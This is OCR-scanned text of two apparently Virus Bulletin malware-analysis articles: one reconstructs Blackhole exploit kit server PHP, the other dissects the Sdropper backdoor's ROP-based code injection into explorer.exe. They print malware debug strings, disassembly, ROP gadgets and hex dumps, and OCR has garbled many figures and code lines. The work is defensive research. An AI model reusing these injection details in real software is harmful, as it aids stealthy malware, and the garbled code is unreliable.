As usual, the path to success was not an easy one. There 
would have been an easy way if I could have guessed the 
password used for obfuscation. I had my turn with five to 
50 attempts to guess it, but it was not as trivial a password 
choice as for the admin panel. Having failed to find the right 
one, I had to proceed the hard way. 

With systematic effort, most of the code could be cleared 
from the cryptic function names. At this point I have to 
confess that despite my best efforts I could not reach 
a runnable or even a syntactically correct source code. 

But that was never my goal; I just wanted to clean it up 
to a level that made it possible to understand the server 
operation. And that level was reached. 

Cookbook examples 

It is understandable that malware authors do not have 
time to write each module from scratch, thus they use the 
generally available example codes. For instance, it is easy to 
recognize that this code snippet is a standard MySQL query 
sequence: 

if ( @!_obfuscate_DQgSFjcQIlw8Wxo7GjUTMhwUJhclB 
ily( @( "MysqlHost" ), @( "MysqlUsername" ), @( 
"MysqlPassword" ) ) ) 

{ 

throw new exception( _obfuscate_DRgQDxsMHjgbHQcL 
KBgoNiQXCgYnGREy( ) ); 

} 

if ( @!_obfuscate_DQsfFxgOEDw_ 
MhliDiRbORcpFiQqWwEy( @( "MysqlDatabase" ) ) ) 

{ 

throw new exception( "unable to select database" 

) ; 

} 

_obfuscate_DQIuEgQHBzM_MTQkFD4YCjILNzcvCCIy( "UPDATE 
Logs SET ExploitID="._obfuscate_DRkHJz4lOylAAiEOLBQ 
JXAMvJgUnlhEy( $_GET['e'] FileID="._obfuscate_ 

DRkHJz4lOylAAiEOLBQJXAMvJgUnlhEy( $_GET['f'] ).", 

IPStatus=l WHERE (IP = inet_aton('".$_SERVER['REMOTE_ 
ADDR'] ) and (Redirect = 0) and (IPStatus = 0) order 

by DateTime desc limit 1" ); 

if ( _obfuscate_DQUzJRIPGzAQDgM3EwM5CzEUJgMWKSIy( ) 

= = 0 ) 

{ 

exit( ); 

} 

From the messages it is straightforward to identify the 
key functions, and rewrite the code in this more readable 
form: 


if ( @!mysql_connect( @( "MysqlHost" ), @( 
"MysqlUsername" ), @( "MysqlPassword" ) ) ) 

{ 

throw new exception( mysql_connect_error( ) ); 

} 

if ( @!mysql_select_db( @( "MysqlDatabase" ) ) ) 

{ 

throw new exception( "unable to select 
database" ); 

} 

mysql_query( "UPDATE Logs SET ExploitID=".mysql_ 
real_escape_string( $_GET['e'] ).", FileID=".mysql_ 

real_escape_string( $_GET['f'] ).", IPStatus=l WHERE 

(IP = inet_aton('".$_SERVER['REMOTE_ADDR'] ) and 

(Redirect=0) and (IPStatus=0) order by DateTime desc 
limit 1" ); 

if ( mysql_error( ) == 0 ) 

{ 

exit( ); 

} 

I could never be sure about mysql_real_escape_string(). 

It is clear that at that point of the code one of the input 
sanitizer functions should be present. It could alternatively 
be stripslashes(), but as it was used in contexts where I felt 
it was less likely to make sense, I picked the other one. 

PHP experts will notice at this point that the code makes no 
sense this way, the fragment @( “MysqlHost” ) would not 
compile - clearly something is missing. Good observation, 
but more on this later... 

Orientating constants 

Some of the function calls use such characteristic 
parameters that their value reveals the function itself. 

As an example, from this code: 

_obfuscate_DTg5Dh0xBTxbFg4MARciKw88CwI4FDIy( 
"LastLanguage", $AuthLanguage, _obfuscate_DSElGBkPOTM 
kCgoSJDOWDTIyKBOLFily( ) + 3600 * 24 * 30, "/" ); 

it was clear that it has something to do with some variables, 
a time duration and a path. The logical conclusion is that 
it is involved in setting a cookie, as this requires these 
two parameters that are normally not present in function 
parameter lists together. 

setcookie( "LastLanguage", $AuthLanguage, time( ) + 
3600 * 24 * 30, "/" ); 

Code functionality analysis 

Encountering a piece of code like this: 

$good = true; 

$i = 0; 
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while ( $i < _obfuscate_DRAxBQwdBxskCygsEhQtIzAOJBUtN 
AEy( $arr ) ) 

{ 

if ( $arr2[$i] != && $arr2 [$i] != $arr[$i] ) 

{ 

$good = false; 
break; 

} 


echo ( "Size" ); 
echo ":</div> "; 

echo _obfuscate_DQkmBwc9GR0BMSMUPCQRJTgaHzcGCxEy 
( _obfuscate_DREhMjIUKiQPLx0kHA0pAw4qDjs Dzly( ( 
"FilesDir" $file['ID'], $file [' Title' ] ) ) ); 

_obfuscate_DREhMjIUKiQPLx0kHA0pAw4qDj s Dzly 
should be the built-in function filesizeQ. 


one could easily guess that it is some sort of array 
comparison. And the obfuscated function in this case 
should have to do something with the upper boundary of 
the comparison, which in the case of arrays logically can be 
nothing else but count(). 


Compare the code with the output 

There are analyses available [6] that show screenshots of the 
admin panel. Unfortunately not from the 1.0.2 version, but 
it was possible to obtain screenshots of both a much newer 
version (1.2.4) and an earlier one (1.0.0 beta). The overall 
layout around the Files list did not change enough to make 
the basic elements unrecognizable. 


O Black hole p STATISTICS threads f iles 


FILES LIST 

Paybadl (exe) 


nATF! 77 lulu 7V\i7 * X 

1 SIZE: 242.42 kfi | 

LOADS: 

loads 

< — 

Virus check ^ 0/0 


CRC32: 42424242 

Last check: never 


MD5: e43el3207341b6bffb7fb 1622232247b 


Figure 6: Layout of version 1.2.4. 


Ask the pro 

As a last resort, when my very limited knowledge of PHP 
was exhausted, I had to seek external help, and turned to 
an experienced PHP programmer (who happened to be a 
former colleague of mine, not unknown to regular readers 
of Virus Bulletin [7]). He pointed out obvious (to him) 
mistakes, and made new observations about the missing 
pieces. 

He discovered one of the reasons why the Dezender 
output is not runnable (apart from the obvious fact that 
the function names are encrypted). Due to the internals 
of decryption, the methods for setting and getting the 
parameters in the config file are completely missing. Thus 
the previously mentioned database connection code had 
the form: 

if ( @!mysql_connect( @( "MysqlHost" ), @( 
"MysqlUsername" ), @( "MysqlPassword" ) ) 

whereas it should be: 

if ( @ !mysql_connect ( @Config : : get ( "MysqlHost" ), 

@ Config::get ( "MysqlUsername" ), @ Config::get ( 
"MysqlPassword" ) ) 

In these cases the decoder either left the method blank, or 
even worse, incorrectly inserted the upcoming decoded 
function call(s) found in the same source line. 

This created indecipherable monsters in the code: 


O Black hole ^ ctathcthka noTOKM <dah/iw 


GIHCQIC 4)AM/1O0 


1262306 

n ata ■ in Ai mi inf -rniri _ u X 


|PA3MEP: 93.00 kB 

3AITP¥3K11: 1 416 M3 00 


riDOBeDKa Ha BMPVCbl ^ 1/26- 
nocnenHRfi nposePKa 2D-OS-201O 16:13:52 

CRC32: ab976a4d 

MD5: 692234d 16f9132da 1577b2849035367f 


$res = ->_obfuscate_DRkHJz4lOylAAiEOLBQJXAMvJgUnlhEy- 
>_obfuscate_DRkHJz4lOylAAiEOLBQJXAMvJgUnlhEy( "select 
Sort from FilesInRules where (FilelD = "._obfuscate_ 
DRkHJz4lOylAAiEOLBQJXAMvJgUnlhEy( $fileID ).") and 
(RulelD = "._obfuscate_DRkHJz410ylAAiE0LBQJXAMvJgUnIh 
Ey( $ruleID ).")" ); 

whereas it was supposed to be the more friendly: 

$res = db::query( "select Sort from FilesInRules 
where (FilelD = ".mysql_real_escape_string( $fileID 
).") and (RulelD = ".mysql_real_escape_string( 

$ruleID ).")" ); 


Figure 7: Layout of version 1.0.0 

This observation helped to determine that in this code 
snippet: 


Looking deeper into this phenomenon revealed that this 
type of function name omission persists for all public class 
functions calls when they are called from a file other than 
the one that defined it. 
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Origins 

When it comes to the question of from where a particular 
malware specimen originated, researchers are in a very 
comfortable situation. We just flip a coin and if it’s heads, 
then it’s China; if it’s tails, then it’s Russia. If it lands on the 
edge, then we conclude government sponsored espionage. 
But there is a more scientific approach as well. 

The first thing to investigate is the code itself. At this point 
we pretend that we have no information gathered from the 
Internet and underground forums, and rely only on what 
we have in our hands. What could have been the most 
revealing factor - the comments inside the source code 
- were unfortunately removed when the code was treated 
with ionCube. Fortunately, enough traces were left though. 

The default time zone of the installation is hard-coded 
to Europe/Moscow. And it is set in adm.php, the admin 
interface, and not in config.php, where the settings are 
expected to modify on installation. 

The user interface supports two languages, English and 
Russian, the default being set to Russian. The user interface 
could support several languages in lang.php. The only 
alternative language supported in the code with its own code 
branch is Russian. So the two main options are that it was 
written by an English speaker for the Russian market or by 
a Russian person for the international market. The admin 
interfaces experienced in the wild were set to Russian 
language each time I tried to access them. 

The text and variable names in the English user interface are 
noticeably (even for a non-native English speaker) incorrect 
in places. On the other hand (and as far as a non-Russian 
speaking person can determine), the Russian interface texts 
are grammatically more correct. 


There are two character encodings supported in the code 
with conversion functions: UTF-8, which is a standard, and 
Windows-1251, which is a Cyrillic encoding. 

And as an additional hint, the date format in the code in 
all places is set to little-endian (D-M-Y). It applies to the 
majority of the planet, including Russia. The two notable 
exceptions are fortunately the other two usual suspects; 

USA uses middle-endian format (M-D-Y), while China uses 
big-endian format (Y-M-D). 

All the evidence supports the assumption that the 
development of the Blackhole exploit kit took place in 
Russia. 

I can’t say that this was a great surprise, because the first 
version of this kit was announced on Russian underground 
forums, and the author claims to be Russian, but it is always 
good to support anecdotal evidence with facts that are not as 
trivial to fake as forum comments. 

The author 

The author of the Blackhole kit is reported to be a Russian 
individual known by the handle Pauncher. More precisely, 
when the first version of the kit appeared in 2010, there 
were three people associated with it. The English translation 
of the readme file of version 1.0 listed Legacy (sales), 
Pauncher (programmer) and Naron (founder). 

As time passed, only Pauncher remained involved with the 
development and distribution of the kit. 

The announcements of the new versions contain an email 
address and an ICQ number serving as contacts for the 
author. The very same contacts are listed for the 
http://crypt.am site, which provides service for inline 
crypting of scripts in the following construction: 



Figure 8: The latest version was also announced in Russian by the author. 
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One-time crypt (5 WMZ) - each crypt worths money 

Monthly unlim (50 WMZ) - unlimited crypts count in 
one month 

This service seems to be a spin-off enterprise, logically 
benefiting from the development of the JavaScript cryptor 
used in the Blackhole main script. 

CONCLUSION 

By now we have reached the point where the Blackhole 
server code is readable enough to understand its overall 
structure and functionality. 

The second part of this article will build on this knowledge 
and focus on the operation of a Blackhole server. We will 
examine in detail what happens on the server side during a 
typical attack, what kind of interaction goes on between the 
infected-to-be host and the infecting hosting server. 
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FEATURE 2 

CODE INJECTION VIA RETURN- 
ORIENTED PROGRAMMING 

Wayne Low 
F-Secure, Finland 

Code injection first became popular in game cheats, 
where it was used to change the program’s course of 
execution. The technique has since been adapted for use 
in the malware world, where it is used in various ways to 
disguise the presence of malicious code on a machine, for 
example by injecting and running the code in a legitimate 
process. 

This analysis focuses on a piece of malware found on a 
customer’s machine which had reportedly been infected 
with ransomware. Behavioural analysis showed that this 
malware did not behave like typical ransomware and it 
appeared to be an ordinary backdoor. Out of curiosity, we 
decided to investigate it to determine whether there were 
any hidden characteristics that could possibly indicate 
that the malware really was ransomware, as the customer 
claimed. Further investigation disclosed a couple of 
interesting details. So the story begins. 

The results of the investigation are as follows: 

1. We believe it to be the first malware found to be 
related to the well-known ‘ Windows messaging 
shatter attack’, which was first discovered by Brett 
Moore in 2004 [1] (proof-of-concepts were available 
in his whitepaper [2] demonstrating how the attack 
worked). 

2. This malware uses an exploitation technique 
to bypass Data Execution Prevention (DEP) in 
conjunction with the Windows shatter attack 
technique in order to perform code injection. 

We believe the author intended to name the malware 
‘sdropper32’ (Shellcode Dropper) as this term can be found 
in a DLL name from the image export table, 

IMAGE_EXPORT_DIRECTORY->Name. From now on, 
we will refer to the malware as Sdropper. 

OVERLY VERBOSE WITH A BUNCH OF 
DEBUG STRINGS 

It is always helpful for the analyst when a malware 
sample comes with debug information, as it gives us hints 
about the malware and makes analysing it easier, even 
if the information is not the full symbol table of the API 
functions used in the code. On first looking at the debug 
strings from the binary, we can deduce the following 
information: 
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• The programming language used by the sample 

• The logging information that will be sent to the 
malware’s command-and-control (C&C) server 

• The functionality of some important modules used in 
the sample 

• The error handling messages. 

DownloadUpdateMain(): e2 
DownloadUpdateMain(): el 

Server::ProcessServerAnswer(): Command v %s' = %x 
Server::SendReport(): Buffer '%s' 

Server::ServerLoopThread(): SendReport '%s' ok 
Server::ServerLoopThread(): SendReport '%s' no answer 
Server::ServerLoopThread(): Sleep: '%d' min 
Drop::InjectStartThread(): inject '%s' (x%s) !!! 

EntryO: integrity: %x, parrent: '%s', current: '%s', 

win: '%s', 

EntryO : Exploit failed 
EntryO : Normal injected failed 
EntryO: System already infected 

Inject::CheckProcessName(): CheckProcessName v %s' ok 
NewZwResumeThread(): InjectProcess started ok 

Inject::CopylmageToProcess(): 
x64ZwAllocateVirtualMemory failed: 

Inject::CopylmageToProcess(): VirtualAllocEx failed: 
%08X 

Inject::CopylmageToProcess(): x64ZwWriteVirtualMemory 
failed: %0 

Inject::CopylmageToProcess(): WriteProcessMemory 
failed: %08X 

Inject::InjectImageToProcess(): x64NtQueueApcThread 
failed: %08X 

Inject::InjectImageToProcess(): NtQueueApcThread 
failed: %08X 

Inject::InjectImageToProcess(): NtQueueApcThread 
failed: %08X 

Inj ect: :Inj ectImageToProcess() : 
x64RtlCreateUserThread failed: % 

Inject::InjectImageToProcess(): CreateRemoteThread 
failed: %08X 

Inject::InjectProcess(): OpenProcess failed: %08X 
Inject::InjectProcess(): Process already injected 
Inject::InjectExplorerProcess(): Injected ok 
Protect::UpdateMain(): EXE UPDATED !!! 

Protect::UpdateMain(): eee3 
Protect::StartProtect(): Old: '%s' 

Protect::StartProtect(): New: '%s' 

Protect::StartProtect(): WriteFileToNewPath error 
Protect::StartProtect(): AddKeyToRun error 
Protect::WriteFileToNewPath(): FileWrite error %x 
Protect::WriteFileToNewPath(): FileRead '%s' error %x 
Modules::ModuleLoad(): Module: '%s' Loaded 


Based on the debug information, it is very easy to identify 
the main payload of this sample, but what caught our 
attention was the exploit string - which made us wonder 
what else was going on. We decided to investigate further to 
see if some sort of exploit was really implemented. 


A MEMORY INJECTION APPROACH 
WITHOUT USING THE CLASSIC MEMORY 
INJECTION TECHNIQUE 

Our initial analysis showed that the malware didn’t use 
the usual memory injection method, so we first had to 
understand how it implements code injection. 

The classic memory injection technique used by many 
traditional malware families will first allocate a block of 
memory using the VirtualAllocEx API function to hold the 
code instructions, which will then be written to the address 
space of the remote process using the WriteProcessMemory 
API function. Since this is a popular method [3] for writing/ 
injecting code into a remote process, it is easily identified 
by anti-virus software through a Host Intrusion Prevention 
System (HIPS). For this reason, Sdropper utilized an 
alternative and intelligent method, without using any 
memory manipulation APIs. 

First, the malware attempts to find a global file mapping 
object in the system, which can be found using one of the 
following section objects: 

i. \BaseNamedObjects\ShimSharedMemory 

ii. YBaseNamedObjectsYwindows_shell_global_counters 

iii. YB aseNamedObj ects\MSCTF. Shared. SFM.MIH 

iv. YB aseN amedObj ects\MSCTF. Shared. SFM. AMF 

v. YB aseN amedObj ects\UrlZonesSM_Administrator 

Handle v3.46 

Copyright (C) 1997-2011 Mark Russinovich 

Sysinternals - www.sysinternals.com 


explorer.exe pid: 1788 %computername%\%username% 

A4: Section \BaseNamedObjects\ShimSharedMemory 
Pagefile 57344 bytes 

354: Section \BaseNamedObjects\UrlZonesSM_analyst 
Pagefile 4 0 96 bytes 

3CC: Section \BaseNamedObjects\mmGlobalPnpInfo 


Figure 2: Global section objects found in Windows Explorer 
on the test machine. 


Figure 1: Excerpt of output debug strings found in the 
sample. 


If the section object can be opened successfully for 
SECTION_MAP_READ and SECTION_MAP_WRITE, 
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Figure 3: List of sections that have global names on the infected machine. 
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Figure 4: Shared memory between malware address space and explorer.exe address space. 


it will create a mapped view with protection level PAGE_ 
READWRITE using ZwMapViewOfSection in the malware’s 
process address space. In my test environment, I was unable 
to see section objects from (ii) to (iv), so ZwOpenSection will 
return STATUS_OBJECT_NAME_NOT_FOUND if it tries 
to open one of these section objects. 

The mapped view returned by ZwMapViewOfSection can 
be shared with other processes. In other words, the sample 


can write code and store contents in this mapped view 
and share it with the explorer.exe address space as well 
[4]. 

As shown in Figure 4, the committed memory is marked as 
read-write only. How did the malware manage to execute 
code in this memory region? And how did the malware 
trigger the code written in this page? We find a clue in its 
export directory table: 
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1. 004065A3 DownloadRunExeld 

2. 00406536 DownloadRunExeUrl 

3. 004065FC DownloadRunModld 

4. 00406676 DownloadUpdateMain 

5. 00404D4E Inj ect ApcRoutine 

6. 00404D33 InjectNormalRoutine 

7. 00405ADB InjectedShellCodeEnd 

8. 00405A8A InjectedShellCodeStart 

9. 00406721 SendLogs 

10. 0040670C WriteConfigString 

The highlighted text shows that it has a shellcode routine 
and its name, InjectedShellCodeStart, indicates that this 
shellcode will be injected somehow into the shared memory. 
In the next section, we will investigate how important this 
shellcode is in this memory injection method. 

DETERMINES ARCHITECTURE BEFORE 
BUILDING LOADER CODE 

On initial execution, the malware will generate the 
platform-specific loader code, together with the custom 
shellcode mentioned in the previous section. To do so, 

S dropper checks the architecture of the infected machine 
using IsWow64Process. 

While building the loader, Sdropper will simultaneously copy 
the code to the memory regions shared with explorer.exe. 

PREPARATION OF LOADER CODE 

The author wrote his own GetProcAddress function (which 
I refer to as _MyGetProcAddress), which has the following 
function prototype: 


_MyGetProcAddress(HMODULE hModule, CHAR *szFuncName, 
BOOLEAN IsRVA) 

This function is able to provide the relative virtual address, 
if IsRVA is set to true; otherwise, it will return the virtual 
address of the specified function name that is similar to 
GetProcAddress. 

To start building the loader code, Sdropper attempts to 
locate the address of the shellcode from the dropper’s 
export table. It also needs to get the size of the shellcode by 
calculating the delta value between InjectedShellCodeStart 
and InjectedShellCodeEnd. It then resolves the following 
API functions, which will be called or used later in the 
shellcode: 

• CloseHandle 

• MapViewOfFile 

• OpenFileMappingA 

• CreateThread 

• SetWindowLong 

The resolved API function address and shellcode are copied 
to the mapped view that was obtained previously. You may 
notice that it also gets the address of SetWindowLong, so 
why on earth does it use the Windows GUI API function? 
We will examine this further later in the article. 

Figure 7 shows how the loader code looks at this point. 

PREPARATION OF LOADER CODE WITH 
RETURN-ORIENTED PAYLOAD 

In order to locate the targeted shared memory address 
in the explorer.exe address space, Sdropper will explore 
all the memory regions available in the process using 
VirtualQueryEx. For each memory region in 
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push 

esi ; lpData 

68 

D8 

79 

40 

00 

push 

oFFset aCurrentpathl ; "CurrentPath** 

E8 

07 

EF 

FF 

FF 

call 

CreatelnFectionMarkerlnSoftwareRegKey 

68 

FF 




push 

OFFFFFFFFh 

E8 

39 

D6 

FF 

FF 

call 

_GetWoW64Info 

85 

C0 




test 

eax, eax 

74 

07 




JZ 

short @0isX86 


Li « d 1 


Li ta 

E8 00 0F 00 00 call x64ShellCodeInjectionl 

EB 05 jmp short loc 405471 

1 

GOisX86: 

E8 24 09 00 00 call x86ShellCodeInjection 



Li m* S 


loc 

405471: 

88 45 FF 

mou 

[ebp+blnjectionSuccess] , al 

30 C3 

cmp 

al, bl 

75 22 

jnz 

short loc 405490 


Figure 5: Checks platform architecture using IsWow64Process. 
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.text 

00405D9B 

push 

ebx 



.text 

00405D9C 

push 

esi 



.text 

00405D9D 

push 

edi 



.text 

00405D9E 

lea 

eax, [ebp+MappedMemSz] 



.text 

00405DA1 

push 

eax ; MappedMemorySz 



.text 

00405DA2 

lea 

eax, [ebp+Ma | JAddr] 



.text 

00405DA5 

push 

eax ; LocalMappedMen 



.text 

00405DA6 

lea 

eax, [ebp+Handle] 



.text 

00405DA9 

xor 

ebx, ebx 



.text 

00405DAB 

push 

eax ; Handle oF mapped memory 



.text 

00405DAC 

mou 

[ebp+blnjecctionSuccess] , bl 



.text 

00405DAF 

call 

GetShellCodePlaceHolderAddress 



.text 

00405DB4 

test 

al, al 



.text 

O0405DB6 

U 

@@exit 



.text 

00405DBC 

mou 

esi, gOurrentProcBaseAddr 



.text 

00405DC2 

push 

ebx 



.text 

00405DC3 

push 

oFFset alnjectedshell ; "InjectedShellCodeStart" 



.text 

00405DC8 

push 

esi 



.text 

00405DC9 

call 

My GetProcAddress 



.text 

00405DCE 

push 

ebx 



.text 

00405DCF 

push 

oFfset alnjectedshel_2 ; "InjectedShellCodeEnd" 



.text 

00405DD4 

push 

esi 



.text 

00405DD5 

mou 

[ebp+AddrShellcode] , eax 



.text 

O0405DD8 

call 

MyGetProcAddress 



.text 

004O5DDD 

mou 

esi, [ebp+MappedAddr] 



.text 

00405DE0 

mou 

edi, eax 



.text 

00405DE2 

sub 

edi, [ebp+AddrShellcode] ; edi = Size oF the shellcode 



.text 

00405DE5 

lea 

eax, [edi+OE0h] ; Allocate space For the shellcode that 

will 

store Func addresses 

.text 

00405DEB 

sub 

esi, eax 



.text 

00405DED 

add 

esi, [ebp+MappedMemSz] ; esi = Actual shellcode address 

that 

hold Function addresses + shellcode 

.text 

0O405DF 0 

push 

eax ; Size 



.text 

00405DF1 

push 

ebx ; Ual 



.text 

00405DF2 

push 

esi ; Dst 



.text 

00405DF3 

mou 

[ebp+customshellcodeaddrontargetedProc] , eax 



.text 

00405DF6 

call 

memset 



.text 

00405DFB 

add 

esp, OCh 



.text 

00405DFE 

push 

edi ; Size 



.text 

00405DFF 

push 

[ebp+AddrShellcode] ; Src 



.text 

O0405E02 

lea 

eax, [esi+ODOh] ; esi+dO => Start shellcode 



.text 

0 04 05 E 08 

push 

eax ; Dst 



.text 

00405E09 

call 

memcpy 




Figure 6: Sdropper customizes the loader shellcode. 



explorer.exe containing the shellcode, it will start building 
the main component in the loader code. 

One of the questions we asked earlier was: how 
does Sdropper execute the shellcode with only 
PAGE_READWRITE level protection? The answer is 
Return-Oriented Programming (ROP), also known as 
return-to-libc, which enables the loader to execute the 
shellcode flawlessly. The malware will create the following 
ROP gadgets (on x86 architecture): 

i. Gadget 1 

• std; 

• retn; 

ii. Gadget 2 


Figure 7: Memory view of incomplete loader code with 
user-mode APIs and shellcode. 


• cld; 

• retn; 


explorer.exe, it reads the whole memory region as a buffer 
using ReadProcessMemory, with the memory size obtained 
from MEMORY_BASIC_INFORMATION.RegionSize. It 
then finds the shellcode buffer using RtlCompareMemory. 
Once Sdropper gets the shared memory address in 


iii. Gadget 3 

• pop eax; 

• retn; 

iv. Gadget 4 

• jmp eax; 
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<£> Explorer.EXE | 


Offset (h) 

00 

01 

02 

03 

04 

05 

06 

07 

08 

09 

OA 

OB 

OC 

OD 

OE 

OF 

00870E00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00870E10 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00870E20 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00870E30 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00870E40 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00870E50 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00870E60 

00 

00 

00 

00 

00 

00 

00 

00 

00 

EO 

60 

91 

1A 

7A 

C4 

01 

00870E70 

00 

E8 

00 

00 

00 

00 

00 

00 

4C 

54 

D2 

94 

ID 

62 

CC 

01 

00870E80 

5C 

00 

3F 

00 

3F 

00 

5C 

00 

43 

00 

3A 

00 

5C 

00 

57 

00 

00870E90 

49 

00 

4E 

00 

44 

00 

4F 

00 

57 

00 

53 

00 

5C 

00 

73 

00 

0O870EA0 

79 

00 

73 

00 

74 

00 

65 

00 

6D 

00 

33 

00 

32 

00 

5C 

00 

OOFTOEgO 

73 

00 

65 

00 

6E 

00 

64 

00 

6D 

00 

61 

00 

69 

00 

6C 

00 

I00870EC0I 

2E 

00 

64 

00 

6C 

00 

6C 

00 

00 

00 

46 

00 

53 

00 

4D 

jioj 

00870ED0 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00870EE0 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00870EF0 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00870F00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00870F10 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00870F20 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00870F30 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00870F40 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00870F50 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00870F60 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

76 

00870F70 

BB 

80 

7C 

05 

B9 

80 

7C 

47 

9B 

80 

7C 

37 

06 

81 

7C 

or 

00870F80 

D6 

41 

7E 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00870F90 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

8B 

00870FA0 

EC 

8B 

75 

08 

33 

DB 

38 

5E 

2C 

75 

32 

8D 

46 

14 

50 

53 

00870FB0 

6A 

26 

C6 

46 

2C 

01 

FF 

16 

8B 

F8 

3B 

FB 

74 

IF 

53 

53 

00870FC0 

53 

6A 

26 

57 

FF 

56 

04 

3B 

C3 

74 

OE 

8B 

4E 

28 

53 

53 

00870FD0 

50 

03 

C8 

51 

53 

53 

FF 

56 

oc 

57 

FF 

56 

08 

FF 

76 

20 

00870FE0 

53 

FF 

76 

24 

FF 

56 

10 

33 

CO 

83 

C4 

54 

5D 

C2 

10 

00 

00870FF0 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00871000 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00871010 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00871020 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00871030 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00871040 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00871050 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00871060 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00871070 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00871080 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00871090 

00 

AO 

13 

80 

5E 

3C 

C6 

01 

00 

D8 

00 

00 

00 

00 

00 

00 

008710A0 1 

E6 

75 

OF 

15 

DE 

BA 

CC 

01 

5C 

00 

3F 

00 

3F 

00 

5C 

00 

008710B0 

43 

00 

3A 

00 

5C 

00 

50 

00 

79 

00 

74 

00 

68 

00 

6F 

00 

008710C0 

6E 

00 

32 

00 

35 

00 

5C 

00 

70 

00 

79 

00 

74 

00 

68 

00 

008710D0 

6F 

00 

6E 

00 

2E 

00 

65 

00 

78 

00 

65 

00 

00 

00 

20 

00 



. .€^<£..0.. 
*u. .e°i.\.?.' 
C.: .\ .P.y.t.l 

n. 2.5.\.p.y.i 

o. n...e.x.e. 


68 E4744800 PUSH f69d336a.004074E4 

89SD F8 MOU DWORD PTR SS:CEBP-83.EBX 

E8 0DC7FFFF CfiLL f69d336a.00402463 

8945 F4 MOU DWORD PTR SS: CEBP-C1. EfiX 

3BC3 CMP EfiX, EBX 

76 5E JBE SHORT f69d336a.00405DlB 

8B749D CC fMOU ESI,DWORD PTR SS:CEBP+EBX»4-34] 

E8 C6F5FFFF CfiLL f69d336a.0040528C 

50 PUSH EfiX 

56 PUSH ESI 

E8 50D3FFFF CfiLL f69d336a.004030ID 

84C0 TEST fiL.OL 

74 4fi II JE SHORT f69d336a.0040SD1B 

56 PUSH ESI 

6fi 00 PUSH 0 

68 10040000 PUSH 410 

FF15 1071400 CfiLL DWORD PTR DS:[407110] 

8BF0 MOU ESI,EfiX 

83FE FF CMP ESI,-1 

74 19 IjE SHORT f 69d336a. 00405CFF 

FF75 0C PUSH DWORD PTR SS: CEBP+C] 

FF75 08 PUSH DWORD PTR SS:CEBP+8] 

56 PUSH ESI 

■' 5FCBFFFF I CfiLL f69d336a.00402851 


aid = 58 

[table = FfiLSE 

> = UM-REflD!QUERV_INFORMATI 


firg3 = 00000131 
0rg2 = 00750ECF 
firgl = 00000058 
F69d336a.00402851 


01FFFFFFFF) 

0CFFFFFFFF) 

01FFFFFFFF) 

0(FFFFFFFF) 
7FFDF0001FFF) 


LastErr ERROR_PfiRTIfiL_COPV (0000012B) 
00000206 (M0,NB,NE,fi,MS,PE,GE,6) 
era>t y 6.4844650431809809790e-4932 


:O04O2866 loc_402866: 
100402866 
100402869 
10040286C 
10040286F 
100402870 
100402873 
100402878 
1QQ40287A 
10040287C 
10040287F 
100402881 
100402883 
100402883 
100402883 
100402886 
100402886 loc_402886i 
100402886 
100402888 
1004Q288B 
10040288C 
10040288D 
100402890 
100402892 
100402894 
100402896 

100402896 loc_402896i 
100402896 
100402897 
100402898 
100402890 
1 0O40289B 
10040289C 
10040289C 


push 

push 

push 

push 

push 

call 

test 

U 

now 

add 

jnz 

Bdloopnextregion : 

add 


push 

lea 

push 

push 

push 

call 

test 

jnz 


; CODE XREFi GetMenoryMappedflddressOnTargetedProc+434.j 
[ebp+ShellCodeSize] ; ShellCodeSize 

[ebp+ShellCodeOnLocalMappedMem] ; ShellCodeOnLocalMappedMem 
[ebp+HemBasicInfo.RegionSize] ; RegionSize 
esi ; NunberOFBytesRead=Process's memory page 

[ebp+hProcess] ; hProcess 

GetOffsetToBufferflddrThatContainsthePattern 
eax, eax 

short @@loop_next_region 
ebx, [ebp+MemBasicInfo.AllocationBase] 
ebx, eax ; ebx = Actual shellcode UA 

short loc_402896 

; CODE XREF: _GetMemoryMappedAddress0nTargetedProc+29l‘j 
esi, [ebp+MemBasicInfo.RegionSize] ; Next page 

